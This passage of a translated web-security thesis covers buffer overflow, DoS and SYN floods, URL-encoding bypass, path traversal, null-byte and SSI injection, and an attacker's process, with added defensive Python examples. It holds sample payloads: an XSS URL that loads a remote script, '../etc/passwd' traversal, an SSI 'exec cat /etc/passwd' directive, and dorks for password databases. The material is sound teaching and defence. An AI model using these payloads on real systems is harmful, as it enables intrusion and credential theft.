The return address has to be changed to point at the shellcode in order to obtain a shell. The placement of the shellcode on the stack can be pictured as follows:
i. Before the overflow:

bottom of memory                                      top of memory
<----- FFFFF BBBBBBBBBBBBBBBBBBBBB EEEE RRRR FFFFFFFFFF
top of stack                                          bottom of stack
B = buffer   E = stack frame pointer   R = return address   F = other data

ii. During the overflow:

bottom of memory                                      top of memory
<----- FFFFF SSSSSSSSSSSSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF
top of stack                                          bottom of stack
S = shellcode   A = pointer to the shellcode   F = other data

(1) Fill the buffer (up to the return address) with the address of the buffer
(2) Place the shellcode in the buffer
The return address then points at the shellcode, and the shellcode obtains a root shell. It is hard, however, to make the return address point exactly at the shellcode. One way to accomplish this difficult task is to put a run of NOP (no operation) instructions at the beginning of the buffer, followed by the shellcode. Then, when the changed return address points anywhere in the start of the buffer, the NOP instructions execute and do nothing until the shellcode is reached, which then does its job of obtaining the root shell. The stack looks like this:

bottom of memory                                      top of memory
<----- FFFFF NNNNNNNNNNNSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF
top of stack                                          bottom of stack
N = NOP   S = shellcode   A = pointer to the shellcode   F = other data

III. WAYS OF CAUSING BUFFER OVERFLOW THROUGH WEB APPLICATIONS:

The basic steps of the buffer overflow technique are: prepare the buffer used for the overflow, determine the return address (RET), determine the address of the buffer holding the shellcode, and finally invoke the overflowed program. Through input fields the hacker can supply a binary string capable of executing code on the server, or crash the system, which has to process data that is too long and exceeds what it can handle (this can also be regarded as a DoS attack, discussed further in the denial-of-service chapter). The code is usually very simple, for example exec(sh) to create a root shell. One example of a buffer overflow attack over the web is the Code Red worm.

IV. COUNTERMEASURES:

Web developers must check the size of data carefully before using it. Use the Referer in the HTTP header to check whether the request originates from the user's machine.

Remarks:
This is the attack technique that goes deepest into the system; it requires the hacker to understand memory organisation and assembly language well. That is only required, however, if the hacker wants to control the system. If the hacker merely alters the size of the input uploaded to the server, then once the data reaches the system it can be brought down because it lacks the capacity to process the request. This kind of attack resembles the denial-of-service attack discussed in detail in the next chapter.

Chapter 9

DENIAL OF SERVICE
Contents:
I. Concept
II. Where DoS attacks can strike
III. Attack techniques
IV. Countermeasures

CHAPTER 9: DENIAL OF SERVICE (DoS)

I. CONCEPT

A DoS attack paralyses network services so that they can no longer respond to requests. This type of attack affects many systems, is very easy to carry out, and is very hard to protect a system against. DoS attacks are usually based on protocols. For example, with the ICMP protocol, a hacker can use an e-mail bomb that sends thousands of e-mail messages to consume bandwidth and exhaust the mail server's resources. Or software can send a flood of requests to the server so that it can no longer respond to legitimate requests.

II. WHERE DoS ATTACKS CAN STRIKE

ATTACKS ON SWAP SPACE: most systems have a few hundred MB of swap space to serve client requests. Swap space is usually used for short-lived child processes, so a DoS can be based on filling the swap space.
ATTACKS ON BANDWIDTH: the bandwidth available to each system is limited, so if a hacker sends many requests at once the bandwidth cannot carry the large volume of data and the system breaks down.

ATTACKS ON RAM: a DoS attack that occupies a large part of RAM can also cause system failure. The buffer overflow attack is one example of this (see chapter ..).
ATTACKS ON DISKS: a classic attack is filling the hard disk. The disk can overflow and become unusable.

III. ATTACK TECHNIQUES:

III.1. The TCP three-way handshake:
First, to understand the DoS attack method, the thesis describes how the TCP three-way handshake works. A TCP packet contains flag bits describing the content and purpose of the packet. Example 9.III.1-1: TCP packets with flags
SYN (synchronize): used to start a connection
ACK (acknowledgement)
FIN (finish): used to tear down a connection
How TCP packets work:

Figure 9.III.1-1: Connection establishment before data transfer

Step 1: the client sends a SYN packet requesting a connection.
Step 2: if the server accepts the connection, it sends a SYN/ACK packet. The server must send this acknowledgement because TCP is a reliable protocol: if the client does not receive it, it assumes the packet was lost and sends a new one.
Step 3: the client replies with an ACK packet, telling the server that it received the SYN/ACK; the connection is now established.

III.2. Exploiting TCP: the traditional SYN flood

Figure 9.III.2-1: Traditional DoS attack

As mentioned about connection establishment in part 1, for any SYN packet the server must dedicate some system resources, such as memory, to receive and transmit data on the connection. System resources are finite, however, and the hacker looks for any way to push the system past that limit (this is called a half-open connection, since the connection between server and client has been opened). Following figure 9.III.2-1: after the server replies with a SYN/ACK accepting the connection, if the requester's IP address is spoofed the packet cannot reach its destination, yet the server still has to reserve resources for the request. After some time without a response from the client, the server sends the SYN/ACK again, and so on; the connection stays open. If the hacker sends so many SYN packets that the server can accept no further connection, the system breaks down.

Conclusion: with only a low-bandwidth link, a hacker can bring down a system. Moreover, the hacker's IP address can be altered, so identifying the culprit is extremely difficult.

III.3. Bandwidth attacks

III.3.1. First type

The hacker is fully able to flood the system because the hacker's bandwidth exceeds the server's. This attack is not limited by network speed. Example 9.III.3.1-1: a hacker with a fast T1 line (1.544 Mbps) or better can easily bring down a system on a 56 Kbps link.

III.3.2. Second type

This attack is used when the hacker's link is much slower than the server's. Unlike the traditional DoS attack (part 2), this bandwidth attack uses packets from many different systems arriving at the target at the same time, so that the target's link can no longer cope and the server can no longer receive any packet.

Figure 9.III.3.2-1: DoS attack on bandwidth

Following figure 9.III.3.2-1, all packets enter a network through one "Big Pipe" (the uplink) and are then split by the router into "Small Pipes" to the many subnet machines according to the packet's IP address. But if the whole Big Pipe is flooded with packets addressed to one particular machine in the subnet, the router has to drop most of the packets, keeping only as many as fit through that machine's Small Pipe. This attack knocks the server off the Internet. It is a denial-of-service method, but it is called DDoS (distributed denial of service) rather than DoS, meaning that many machines are triggered at the same time to send packets to the server (each machine's link is not fast, but many links combine into a Big Pipe), so that the server can no longer receive packets and is removed from the Internet, as illustrated below:

Figure 9.III.3.2-2: DDoS attack

DRDoS (Distributed Reflection Denial of Service), the next generation of DDoS: this is also what brought down the grc.com site. The following figure illustrates the DRDoS attack.

Figure 9.III.3.2-3: DRDoS attack

By spoofing the server's IP address, the hacker simultaneously sends many packets to powerful systems on the network; these systems receive the spoofed SYN, accept the connection and reply with a SYN/ACK. Because the source IP of the SYN packets has been altered to the server's address, the SYN/ACK packets are delivered to the server. Receiving so many packets at once, the server's link cannot cope, the server refuses every packet, and the system collapses.

III.4. Attacks on system resources

This attack targets system resources rather than network resources: CPU, memory, file system, processes, ... The hacker is a legitimate user of the system with a limited resource quota, but abuses this access to request more resources. The system, or other legitimate users, are then denied the shared resources. The attack makes the system unusable because its resources are exhausted and no more processes can run.

IV. COUNTERMEASURES

Denial of service is the attack that causes the most difficulty both in defending and in investigating the culprit, because most hackers change their machine's IP address, making the culprit very hard to identify. To counter link amplification:
- Disable broadcast at the border router
- Increase the connection queue size: this can prevent the queue overflowing from many connections, but uses more resources
- Reduce the connection establishment timeout
- Use software that detects and defeats DoS attacks: most current operating systems support detecting and preventing SYN flood attacks.

Nevertheless there are also tools able to avert this attack. For example, Linux kernels 2.0.30 and later implement an option called SYN Cookies: the kernel tracks and records the signs of a possible SYN attack, then uses a cryptographic protocol, the SYN cookie, that lets legitimate users of the system keep connecting to it. Windows NT 4.0 and later use a backlog technique: whenever the connection queue falls short, the system automatically provides more resources to the queue, so the queue does not break. The application should allow each client only a prescribed maximum number of connections, to stop a hacker from sending many requests at once and causing congestion.
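The SYN cookie idea and the per-client connection cap from the paragraph above, as an added example in Python on constructed packet fields; this is not code from the thesis or from any kernel. The server keeps no state for a half-open connection: the SYN/ACK sequence number is built from a coarse time counter and a keyed tag over the connection 4-tuple, and the final ACK is accepted only if it acknowledges a cookie the server could have issued in the current or previous window. The 8-bit/24-bit split, the 64-second window, the secret and the addresses are assumptions of the example, not the Linux layout.

```python
import hashlib
import hmac

SECRET = b"constructed-server-secret-rotate-in-practice"  # assumed key
TS_SHIFT = 6          # counter advances every 64 s (assumed window)
MAX_PER_CLIENT = 20   # assumed per-client connection cap


def _tag(src, sport, dst, dport, counter):
    """24-bit keyed tag over the 4-tuple and the time counter."""
    msg = f"{src}:{sport}>{dst}:{dport}|{counter}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def make_syn_cookie(src, sport, dst, dport, now):
    """Initial sequence number for the SYN/ACK: 8 bits of time counter plus
    the 24-bit tag.  Nothing about this half-open connection is stored, so a
    flood of spoofed SYNs costs the server no memory."""
    counter = int(now) >> TS_SHIFT
    return ((counter & 0xFF) << 24) | _tag(src, sport, dst, dport, counter)


def verify_syn_cookie(ack_number, src, sport, dst, dport, now):
    """Called when the third-handshake ACK arrives.  The client acknowledges
    cookie + 1, so only a host that really received the SYN/ACK at the claimed
    source address can produce a valid ACK.  Current and previous window only."""
    cookie = (ack_number - 1) & 0xFFFFFFFF
    current = int(now) >> TS_SHIFT
    for counter in (current, current - 1):
        if (counter & 0xFF) != cookie >> 24:
            continue
        expected = _tag(src, sport, dst, dport, counter).to_bytes(3, "big")
        got = (cookie & 0xFFFFFF).to_bytes(3, "big")
        if hmac.compare_digest(expected, got):
            return True
    return False


class ConnectionLimiter:
    """Per-client cap from the last sentence of section IV: refuse to open a
    connection once a client address already holds `limit` open ones."""

    def __init__(self, limit=MAX_PER_CLIENT):
        self._limit = limit
        self._open = {}

    def try_open(self, client_ip):
        if self._open.get(client_ip, 0) >= self._limit:
            return False
        self._open[client_ip] = self._open.get(client_ip, 0) + 1
        return True

    def close(self, client_ip):
        if self._open.get(client_ip, 0) > 0:
            self._open[client_ip] -= 1
```

The cookie is only a proof that the ACK came from somebody who saw the SYN/ACK; it does nothing against the bandwidth attacks of III.3, which is why the limiter and the router-level measures remain necessary alongside it.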

Remarks:
Although a denial-of-service attack only brings the system down for a few minutes, the consequences can be considerable (financial and reputational). It is the technique hackers commonly use when they cannot take over administration of the system or its information, or when they want to damage an organisation's reputation. Address spoofing additionally makes it easy for the hacker to attack without fear of detection. This technique is usually carried out with the support of tools such as ping of death, teardrop, ... These tools are listed further in the following chapter.

Chapter 10

OTHER ATTACK TECHNIQUES

Contents:
I. URL encoding
II. Path traversal attack
III. Null character attack
IV. Server-side languages

CHAPTER 10: OTHER ATTACK TECHNIQUES

I. URL ENCODING

I.1. Concept
RFC 1738 defines URLs and RFC 2369 URIs; the characters permitted in a URL or URI are a subset of the US-ASCII character set. Under RFC 1738 and 2369, digits, letters, the special characters $-_.+!*() and certain reserved characters are not encoded in URLs or URIs. Other special characters are encoded, such as the space, < and >. After receiving this data the server decodes it automatically and proceeds as normal. What can a hacker exploit in URL encoding? Developers may design the application to check whether user input is valid, so that special characters such as < and > in script tags, which are commonly used in attacks such as XSS, are removed. So, to make the data pass this check, instead of entering the special characters directly the hacker can enter them encoded according to RFC 1738 and RFC 2369. In this way the hacker easily bypasses the check.


Example 10.I.1-1:
http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourserver.com%2fbadscript.js%22%3e%3c%2fscript%3e

After decoding, the variable mydata carries:

<script src="http://www.yourserver.com/badscript.js"></script>

I.2. Countermeasures

Avoid the GET method where possible, since GET data is carried in the URL and is trivially modified; use POST whenever you can. Note, however, that POST only makes tampering less convenient: a request body can be percent-encoded and edited just as easily with a proxy, so the choice of method is not a defense in itself. When a URL must be used to pass data to the server, restrict the type of data accepted and validate it in the application before using it. The validation must run on the decoded value (decode exactly once, then check), not on the raw encoded string, or the bypass above still works. Do not rely on client-side languages to check the validity of the data.
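The following Python example is added here to make the bypass and its fix concrete; it is not code from the thesis. It places a naive filter that inspects the still-encoded query string next to one that decodes each parameter fully and then validates, using the payload from Example 10.I.1-1. The blocklist FORBIDDEN and the attack URL are assumptions constructed for the example.

```python
"""Added example (not from the original thesis): percent-encoding bypass of a
pre-decoding filter, and the decode-then-validate pattern that closes it."""
from urllib.parse import urlsplit, parse_qsl, unquote

FORBIDDEN = set('<>"\'')  # hypothetical set of characters the application refuses


def naive_filter(raw_query: str) -> bool:
    """Vulnerable: looks for forbidden characters in the raw query string,
    before the server has percent-decoded it.  Returns True when input passes."""
    return not any(c in raw_query for c in FORBIDDEN)


def canonical_decode(value: str, max_rounds: int = 3) -> str:
    """Decode until the value stops changing, so a doubly-encoded payload
    (%253c -> %3c -> <) cannot hide behind the first decoding layer.
    Give up after a few rounds; real clients never nest encodings that deep."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError("excessive nested percent-encoding")


def safe_filter(raw_query: str) -> bool:
    """Hardened: split into parameters (parse_qsl removes one encoding layer),
    fully decode each value, then validate the decoded text, which is what
    the application will actually use."""
    for _, value in parse_qsl(raw_query, keep_blank_values=True):
        try:
            value = canonical_decode(value)
        except ValueError:
            return False
        if any(c in value for c in FORBIDDEN):
            return False
    return True


def server_view(url: str) -> dict:
    """The parameter values a server-side script receives after decoding."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


# Constructed attack URL carrying the payload of Example 10.I.1-1.
ATTACK_URL = ("http://www.myserver.com/script.php?mydata="
              "%3cscript%20src=%22http%3a%2f%2fwww.yourserver.com%2fbadscript.js%22%3e%3c%2fscript%3e")

if __name__ == "__main__":
    query = urlsplit(ATTACK_URL).query
    print("naive filter passes attack:", naive_filter(query))
    print("safe filter passes attack: ", safe_filter(query))
    print("server sees mydata =", server_view(ATTACK_URL)["mydata"])
```

The ordering is the whole point: the naive filter and the server disagree about what the input is because they look at it before and after decoding. Validating the fully decoded value removes that disagreement, and rejecting inputs that keep changing under repeated decoding refuses the double-encoding trick outright instead of guessing how many layers the server will strip.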

II. PATH TRAVERSAL ATTACKS

II.1. Concept

Many applications use the server's file system in their presentation layer to display information or to store temporary data. These files include images, HTML files and CGI programs. WWW-ROOT is the virtual root directory on the web server, the directory the browser is allowed to reach; applications store information either inside or outside WWW-ROOT. If the application does not filter the special characters commonly used in paths, such as the sequence ../, it is likely to be vulnerable to a path traversal attack: the hacker can ask the server to return the contents of physical files such as /etc/passwd.

In summary, this attack again relies on lax validation of data in the URL, cookies and HTTP request headers. By abusing the application's own permission to read a file, the hacker can read files stored on the system.

Example 10.II.1-1:
http://maydich.com/show.asp?result=dangnhapthanhcong.asp

but if the hacker changes the name of the file being requested to:

http://maydich.com/show.asp?result=../etc/passwd

the hacker can read the contents of the password file stored on the system (in practice the ../ is repeated as many times as needed to climb from the application's directory to the root of the file system).

II.2. Countermeasures

Preventing path traversal is a real challenge for application developers in a distributed system. Nevertheless, the best defense is still for the application to check every file access before returning the result to the browser: resolve the requested path to its canonical absolute form and confirm that it lies inside the intended directory, rather than trying to strip ../ sequences, which can be percent-encoded (%2e%2e%2f) or doubled to slip past a blacklist.
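As an added example (not the thesis's own code), the Python below mirrors the show.asp?result= viewer from Example 10.II.1-1 twice: once joining the parameter straight onto the document root, and once with the canonical-path containment check recommended above. The directory tree, including a stand-in for /etc/passwd, is created in a temporary directory so the example runs offline; the file names and contents are constructed.

```python
"""Added example (not from the original thesis): path traversal against a naive
file viewer, and the realpath + containment check that stops it."""
import os
import tempfile
from urllib.parse import unquote


def make_layout() -> str:
    """Build a throwaway tree: <base>/www is the document root and
    <base>/etc/passwd stands in for the real system file.  Returns the docroot."""
    base = tempfile.mkdtemp(prefix="traversal-demo-")
    docroot = os.path.join(base, "www")
    os.makedirs(docroot)
    os.makedirs(os.path.join(base, "etc"))
    with open(os.path.join(docroot, "dangnhapthanhcong.asp"), "w") as f:
        f.write("login successful page")
    with open(os.path.join(base, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed sample line
    return docroot


def show_vulnerable(docroot: str, result: str) -> str:
    """Mirrors show.asp?result=...: joins the decoded parameter onto the
    document root and opens whatever that names.  '../' walks out of the root."""
    with open(os.path.join(docroot, unquote(result))) as f:
        return f.read()


def escapes_root(docroot: str, result: str) -> bool:
    """True if the decoded path, after canonicalisation (which collapses '..'
    and follows symlinks), lies outside the document root.  An absolute
    'result' makes os.path.join discard docroot entirely; comparing against
    the canonical root catches that case as well."""
    root = os.path.realpath(docroot)
    target = os.path.realpath(os.path.join(root, unquote(result)))
    return os.path.commonpath([root, target]) != root


def show_safe(docroot: str, result: str) -> str:
    """Hardened viewer: refuse anything that resolves outside the root."""
    if escapes_root(docroot, result):
        raise PermissionError("path escapes document root: %r" % result)
    with open(os.path.join(os.path.realpath(docroot), unquote(result))) as f:
        return f.read()


if __name__ == "__main__":
    root = make_layout()
    print(show_vulnerable(root, "../etc/passwd"))      # leaks the sample passwd line
    print(escapes_root(root, "..%2fetc%2fpasswd"))     # True: encoded form caught too
    print(show_safe(root, "dangnhapthanhcong.asp"))    # legitimate page still served
```

The check compares canonical paths rather than searching the string for "..": encoding, redundant separators and symlinks are all resolved by realpath before the comparison, so there is nothing left for the attacker to hide behind.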


III. NULL-BYTE ATTACKS

III.1. Concept

Many web applications use languages such as C or Java to build modules that process data supplied by the user. A hacker can exploit the string-terminator character by embedding it in the input to deceive the application.

Example 10.III.1-1: suppose the hacker submits the string AA\0BB. When it passes through a module written in C, the string is cut short to AA, because C treats \0 as the end of the string. The hacker can use this to slip past checks on the content of the string: a validation layer written in a language whose strings may contain \0 sees and approves the whole input, while the C code beneath it acts only on the part before the null byte.

III.2. Countermeasures

The only defense is to accept nothing but valid data: a character such as \0 must be removed, or the request rejected, before the application uses the input.
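The following Python example is added to show the truncation from the point of view of the higher-level validation layer; it is not code from the thesis. ctypes.c_char_p applies genuine C string semantics, so the value a C function would act on can be compared with what the validator saw. The allow-list policy and the file name are assumptions constructed for the example.

```python
"""Added example (not from the original thesis): the null-byte gap between a
validator that handles full byte strings and a C layer that stops at NUL."""
import ctypes

ALLOWED_SUFFIX = b".jpg"  # hypothetical policy: the module may only open images


def c_view(data: bytes) -> bytes:
    """The bytes a C function such as fopen() would actually use: c_char_p
    reads a NUL-terminated string, so .value stops at the first \\x00."""
    return ctypes.c_char_p(data).value


def validate_naive(name: bytes) -> bool:
    """Vulnerable: the check runs on the full Python bytes object, which
    carries an embedded NUL without complaint, so the suffix test sees '.jpg'."""
    return name.endswith(ALLOWED_SUFFIX) and b".." not in name


def validate_safe(name: bytes) -> bool:
    """Hardened: an embedded NUL has no legitimate meaning in a file name;
    reject it before any other check."""
    if b"\x00" in name:
        return False
    return validate_naive(name)


def opened_by_c_layer(name: bytes) -> bytes:
    """What the C module will really try to open once the check has passed."""
    return c_view(name)


ATTACK = b"/etc/passwd\x00.jpg"  # constructed payload

if __name__ == "__main__":
    print("naive validator accepts:", validate_naive(ATTACK))
    print("C layer opens:          ", opened_by_c_layer(ATTACK))
    print("safe validator accepts: ", validate_safe(ATTACK))
```

The two layers disagree about where the string ends; as with URL encoding, the fix is to make the validator see exactly what the consumer will see, here by refusing any input the C layer would silently shorten.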

IV. SERVER-SIDE LANGUAGE (SERVER SIDE INCLUDES)

IV.1. Concept

A Server Side Include (SSI) is a directive embedded in a web page that asks the web server to supply some information at that point in the page.

Example 10.IV.1-1:

<!--#include file="test.asp"-->

This directive embeds the contents of the file test.asp in the page. SSI is not supported by every web server; Apache and IIS are two that do support it. Pages that use SSI are usually saved with the extension .shtml or .stm (in place of .html or .htm) to tell the server that the page uses SSI, which saves the server from having to scan every page for directives.

Serving a page that contains SSI works as follows. Without any directives the server simply sends the page to the browser; with SSI the steps are:
+ The server reads the page and parses it, looking for and classifying the special directives it has to execute.
+ Based on the directives it finds, the server executes them.
+ The server returns the result to the browser.

Three kinds of action are possible: insert information from a file into the page, assign values to variables, and call a CGI program. The SSI directive syntax is given in the appendix.


IV.2. How the attack works

The hacker uses an input field to inject the text of an SSI directive into a page that the server will process.

Example 10.IV.2-1:
<!--#jdbc select="SELECT * FROM User" name="result" driver="org.gjt.mm.mysql.Driver" url="jdbc:mysql://localhost:3306/project" -->
    Sets up the SELECT statement.
<!--#jdbc name="result" next="true" -->
    Moves the cursor to the first row of the result set.
<!--#jdbc name="result" column="1" -->
    Displays the first column of that row.

IV.3. Countermeasures

For administrators: reconfigure the web server so that it does not process SSI (or at least disable the exec directive) in directories that hold content influenced by users. For programmers: check the data sent by users carefully and remove or escape characters such as < > # -- !. This must be done on the server; checking validity with a client-side language is not enough, because the user can alter the content of the page.
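As an added example (not the thesis's own code), the Python below renders a visitor's message into a guest-book page that the server would serve as .shtml, first by plain concatenation and then with HTML escaping, and includes a small scanner that lists the SSI directives present in a page. The template, the visitor message and the exec payload are constructed for the example.

```python
"""Added example (not from the original thesis): SSI injection through an
unescaped page fragment, the escaping that neutralises it, and a directive
scanner for auditing content served with SSI processing enabled."""
import html
import re

# Matches Apache/IIS-style SSI directives: <!--#cmd attr="value" ... -->
SSI_DIRECTIVE = re.compile(r"<!--#\s*([a-z]+)\b(.*?)-->", re.IGNORECASE | re.DOTALL)

# Constructed page template the hypothetical application writes to guestbook.shtml.
TEMPLATE = "<html><body><h1>Guest book</h1><p>{message}</p></body></html>"


def render_vulnerable(message: str) -> str:
    """Vulnerable: visitor text lands in the .shtml page verbatim, so any
    <!--#exec ...--> it contains is executed by the server on the next request."""
    return TEMPLATE.format(message=message)


def render_safe(message: str) -> str:
    """Hardened: HTML-escape the text before it reaches the page.  '<' becomes
    '&lt;', so the server's SSI parser never sees a directive opener."""
    return TEMPLATE.format(message=html.escape(message, quote=True))


def find_ssi(page: str) -> list:
    """Return the (lower-cased) names of SSI directives present in a page."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(page)]


ATTACK = '<!--#exec cmd="cat /etc/passwd" -->'  # constructed payload

if __name__ == "__main__":
    print("directives in vulnerable page:", find_ssi(render_vulnerable(ATTACK)))
    print("directives in safe page:      ", find_ssi(render_safe(ATTACK)))
    print(render_safe(ATTACK))
```

Escaping on output is the programmer's control; running find_ssi over files in an SSI-enabled directory is a cheap audit an administrator can add, since any directive appearing inside user-contributed text is a sign the escaping was missed.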


Chapter 11

SUMMARY OF A HACKER'S ATTACK PROCESS

Contents:
I. Gathering information about the target's infrastructure
II. Surveying the web application
III. Attacking


According to Hacking Exposed by Stuart McClure, Joel Scambray and George Kurtz, attackers usually proceed through the following stages when attacking a target.

I. GATHERING INFORMATION ABOUT THE TARGET'S INFRASTRUCTURE

Step 1: Footprinting (information gathering). The hacker collects as much information as possible about the host, the organization and its users: IP address ranges, Whois records, DNS data and so on, all of it public information officially associated with the target.
Tools: UseNet, search engines, EDGAR, any Unix client, http://www.networksolutions.com/whois, http://www.arin.net/whois, nslookup with ls -d (zone transfer), dig, Sam Spade.

Step 2: Scanning (probing). Most of the important information about the server comes from this step: port scanning, operating-system identification and so on, to learn which ports are open on the server and to sniff its traffic.
Tools: fping, icmpenum, WS_Ping ProPack, nmap, SuperScan, fscan, queso, siphon.

Step 3: Enumeration (listing resources to find weaknesses). The third step searches for poorly protected resources or user accounts that can be used to break in, including default passwords, default scripts and default services. Many network administrators are unaware of these or never change them.
Tools: null sessions, DumpACL, sid2user, OnSite Admin, showmount, NAT, Legion, banner grabbing with telnet or netcat, rpcinfo.

Step 4: Gaining access. The hacker now tries to get into the network using the information obtained in the three steps above, for example by attacking a buffer overflow, retrieving and cracking a password file, or brute-forcing passwords (trying every possibility).
Tools: tcpdump, L0phtcrack, readsmb, NAT, Legion, tftp, pwdump2 (NT), ttdb, bind, IIS HTR/ISM.DLL.

Step 5: Escalating privilege. Once the hacker has entered the network with some account, they try to take control of the whole system, by cracking the administrator's password or exploiting a privilege-escalation hole. John the Ripper is a commonly used password cracker.
Tools: L0phtcrack, lc_messages, getadmin, sechole.

Step 6: Pilfering (used when files holding passwords are exposed). Search tools are used once more to find further ways into the network. Plain-text files containing passwords and other insecure mechanisms are the target; the information gathered here is used to locate and take control of other servers. If this step fails, the hacker falls back on the last resort, denial of service (see section III).
Tools: .rhosts, LSA Secrets, user data, configuration files, the Registry.

Step 7: Covering tracks. After obtaining the information they need, the hacker erases their traces by clearing the operating system's log files, so that the administrator does not realise the system was compromised or, if they do, cannot tell who the intruder was.
Tools: Zap, Event Log GUI, rootkits, file streaming.

Step 8: Creating back doors (to make the next intrusion easier). The hacker leaves a back door, a mechanism that lets them return by a hidden path without much effort, by installing a Trojan or creating a new user account (in organizations with many users). Related techniques: keyloggers, rogue user accounts, scheduled batch jobs, infected startup files, planted remote-control services, monitoring mechanisms, applications replaced with Trojans.
Tools: membership of wheel or Administrators, cron, at, rc and Startup folder entries, registry keys, netcat, remote.exe, VNC, BO2K, keystroke loggers, adding accounts to secadmin mail aliases, login, fpnwclnt.dll.

II. SURVEYING THE WEB APPLICATION

A very common survey technique is to read the source code and exploit bugs that allow source code to be viewed. Several popular web languages have many such bugs: Active Server Pages (ASP), Common Gateway Interface (CGI), ColdFusion Server (CFM) and Hypertext Preprocessor (PHP). Sites with these bugs can be found with www.google.com by searching for the relevant keywords. Putting allinurl: before the string to look for guarantees that every page returned contains that string in its URL.

Example 11.II-1: allinurl:/advadmin (without quotes) lists only pages whose URL has the form http://tentrangweb.com/advadmin.

To find files of a given type on http://www.google.com, put filetype: before the extension to search for.

Example 11.II-2:
+ To find .mdb files (Microsoft Access databases, which frequently hold a site's user and password tables), go to http://www.google.com and type filetype:mdb.
+ To find SAM files (the Windows NT password database, which L0phtCrack can crack), go to http://www.google.com and type filetype:SAM.

Attacking the control mechanisms (authentication, authorization): this covers password guessing, changing cookie values, directory traversal, privilege escalation, and SQL-based attacks such as SQL injection.

Understanding the application's functions in depth: learn how each part of the application works, especially order input, confirmation and order tracking. SQL injection and input-validation attacks can be applied here.

Understanding the flow of information: the data exchanged between client and server and with the database. Code that performs this exchange must be both efficient (fast) and secure (which may make it slower). Efficiency usually gets priority, so mistakes creep in during development that let a hacker exploit flaws such as SQL injection to take control of the system.

III. ATTACKING
After gathering information and surveying the target thoroughly, the hacker begins the attack: breaking into the system to steal information, plant malicious content, seize control, and so on. If the intrusion fails, denial of service is the last option the hacker usually turns to, so that the system can no longer operate.


Remarks:
Information gathering is vitally important to any attack on a server. Whether the hacker attacks at the hardware level or through the application, the gathering step is still needed; what varies is how the steps are carried out. The hacker need not follow the steps in order or complete them all, but a thorough knowledge of the server is always the precondition for a successful attack, and the information gathered decides which technique the hacker will use. Securing a system therefore demands the combined effort not only of the system administrator but also of the application designer and the customers who use the application. This task is discussed in more detail in chapter 12.


Chapter 12

SUMMARY OF COUNTERMEASURES

Contents: defending against hackers requires the roles of
I. The network administrator
II. The web application designer
III. The user


Defending against hackers is not the job of web programmers alone; it requires the cooperation and support of the administrator and of the users themselves. A lapse in any one of these can lead to information being stolen, or even to the hacker taking control of the whole network. To protect a system from attack, the thesis therefore presents the measures under three roles: the network administrator, the application programmer and the user.

I. FOR NETWORK ADMINISTRATORS

The system administrator must identify which objects in the system are the most important to protect, and assign each a priority. Examples of objects to protect are: service hosts, routers, system access points, application programs, database management systems, and the services offered.

Configuring applications: be careful when configuring the web server and certain applications. Decide whether the server should be allowed to execute SSI directives at all. Also grant each application only limited rights, for instance in the database management system (never run it as Admin), so that a hacker cannot abuse the application to run system-control commands.

Identifying the threats to the system means identifying the security holes in the services and applications running on it. Doing this accurately lets the administrator avoid attacks or defend against them correctly, by following security newsgroups and vendor bulletins to learn of bugs in the software in use. When a bug is announced, update to the latest version so that a hacker cannot exploit the hole in the unpatched old release.

Understand how the software in use works and the meaning of the important configuration files (such as /etc/passwd), and protect their configuration, for example by checking their integrity with a hash such as MD5.

Use tools that can detect illegitimate access to the system, such as log file analysis.

Control the privileges of the accounts on the system tightly; do not use root where it is not needed. Change the password of unused accounts or remove them.

Manage passwords strictly:
o Force users to change their password after a fixed period. Most current systems support this; if the password is not changed, the account becomes invalid.
o When a user loses a password, issuing a new one must involve further procedures that authenticate the user.
o Closely monitor the password-change programs, which are a frequent attack target.

II. FOR WEB APPLICATION DESIGNERS

Ensure that data supplied by the user is valid: all data entering the application must be checked carefully, and special characters such as < > / removed or rejected. Do not rely on client-side languages (JavaScript, VBScript) for this check, because a hacker can still attack as in the URL-encoding and path-traversal techniques; the best place to check remains the application itself on the server. Where characters cannot be rejected or removed, the application must also validate its output to ensure that what reaches the browser is safe.

Example 12.II-1: with SQL injection, the application should return an error page of its own design rather than the database's error message, to stop a hacker reading SQL syntax details from the error text.

The application can also use the HTTP headers, in particular Referer, to check that a request did not originate from the hacker's own machine, as in the buffer overflow and hidden-form-field manipulation techniques. Bear in mind that Referer is set by the client and is trivially forged, so treat it as a weak signal rather than a control.

Authenticating the user: many applications manage a user's session with a sessionID, but weak session management lets a hacker take over the session easily, as in the session-management techniques. The application should therefore destroy the session as soon as the browser closes the connection, and expire sessions that stay idle.

Encrypting important data: sensitive information such as username/password and credit card numbers must be encrypted so that a hacker who obtains it through XSS or SQL injection cannot use it. In transit, use SSL to prevent the loss of information on the wire. Many cryptographic methods exist (secret-key, public-key), so choose according to the sensitivity of the data. However, many developers derive identifiers from data such as the date, time or IP address, which a hacker can easily predict, or use values so short that a hacker can enumerate every possibility with readily available tools, as in the sessionID attack; others use obsolete methods that tools such as John the Ripper crack with ease. Choose the algorithm and key so that the data is neither predictable nor enumerable; passwords in particular should be stored as salted hashes of a deliberately slow algorithm, never reversibly encrypted or hashed with plain MD5.

Using SSL is also necessary to prevent data being stolen in transit.

Using off-the-shelf software: products such as AppShield act as a proxy, an intermediary between client and server. Every request from the client passes through it, and if a request is found to contain a possible attack on the system the request is dropped rather than forwarded to the server.

Setting privileges: the system should give applications only the rights they need to perform their functions. Never give the highest privilege, such as root, because a hacker could use it to execute system commands, as in the SQL injection and buffer overflow techniques.
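The two identifier problems this section describes, predictable sessionIDs and weak password storage, are shown below in an added Python example that is not code from the thesis. Each anti-pattern sits beside a sound replacement built only on the standard library; the client IP, timestamps and user password are constructed, and the PBKDF2 iteration count is an assumed policy value.

```python
"""Added example (not from the original thesis): predictable vs. random session
identifiers, and unsalted MD5 vs. salted PBKDF2 for stored passwords."""
import hashlib
import hmac
import os
import secrets


def weak_session_id(ip: str, when: float) -> str:
    """The anti-pattern: derived from the client's IP and a timestamp.  Anyone
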